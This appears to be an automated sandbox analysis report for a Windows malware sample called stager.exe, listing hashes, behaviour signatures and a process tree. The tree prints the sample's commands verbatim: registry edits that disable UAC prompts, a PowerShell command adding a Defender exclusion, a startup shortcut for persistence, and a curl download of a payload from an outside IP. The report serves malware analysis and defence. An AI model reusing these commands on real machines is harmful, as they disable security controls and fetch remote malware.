Analysis
max time kernel: 118s
max time network: 122s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 19/07/2023, 13:01
Static task
static1: 1 signatures

Behavioral task
behavioral1
Sample: stager.exe
Resource: win7-20230712-en
6 signatures
150 seconds
General
Target: stager.exe
Size: 1.9MB
MD5: 4ed2a8948a165b72025d5868a31a34c8
SHA1: b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8
SHA256: 79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282
SHA512: 64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380
SSDEEP: 24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd
Malware Config
Signatures
UAC bypass 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | reg.exe

Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk | stager.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses 1 IoCs
pid | Process
2196 | powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2196 | powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs
description | pid | Process | procid_target
PID 2572 wrote to memory of 2628 | 2572 | stager.exe | 29
PID 2572 wrote to memory of 2628 | 2572 | stager.exe | 29
PID 2572 wrote to memory of 2628 | 2572 | stager.exe | 29
PID 2628 wrote to memory of 2560 | 2628 | cmd.exe | 30
PID 2628 wrote to memory of 2560 | 2628 | cmd.exe | 30
PID 2628 wrote to memory of 2560 | 2628 | cmd.exe | 30
PID 2572 wrote to memory of 2556 | 2572 | stager.exe | 31
PID 2572 wrote to memory of 2556 | 2572 | stager.exe | 31
PID 2572 wrote to memory of 2556 | 2572 | stager.exe | 31
PID 2556 wrote to memory of 1640 | 2556 | cmd.exe | 32
PID 2556 wrote to memory of 1640 | 2556 | cmd.exe | 32
PID 2556 wrote to memory of 1640 | 2556 | cmd.exe | 32
PID 2572 wrote to memory of 2680 | 2572 | stager.exe | 33
PID 2572 wrote to memory of 2680 | 2572 | stager.exe | 33
PID 2572 wrote to memory of 2680 | 2572 | stager.exe | 33
PID 2572 wrote to memory of 1284 | 2572 | stager.exe | 34
PID 2572 wrote to memory of 1284 | 2572 | stager.exe | 34
PID 2572 wrote to memory of 1284 | 2572 | stager.exe | 34
PID 1284 wrote to memory of 2196 | 1284 | cmd.exe | 35
PID 1284 wrote to memory of 2196 | 1284 | cmd.exe | 35
PID 1284 wrote to memory of 2196 | 1284 | cmd.exe | 35
PID 2572 wrote to memory of 2924 | 2572 | stager.exe | 36
PID 2572 wrote to memory of 2924 | 2572 | stager.exe | 36
PID 2572 wrote to memory of 2924 | 2572 | stager.exe | 36
Processes (depth level in brackets)

[1] C:\Users\Admin\AppData\Local\Temp\stager.exe (PID 2572)
    command line: "C:\Users\Admin\AppData\Local\Temp\stager.exe"
    signatures: Drops startup file; Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe (PID 2628)
        command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        signatures: Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe (PID 2560)
            command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
            signatures: UAC bypass

    [2] C:\Windows\system32\cmd.exe (PID 2556)
        command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        signatures: Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe (PID 1640)
            command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
            signatures: UAC bypass

    [2] C:\Windows\system32\cmd.exe (PID 2680)
        command line: C:\Windows\system32\cmd.exe /c mkdir "C:\MicS"

    [2] C:\Windows\system32\cmd.exe (PID 1284)
        command line: C:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
        signatures: Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2196)
            command line: powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
            signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\system32\cmd.exe (PID 2924)
        command line: C:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"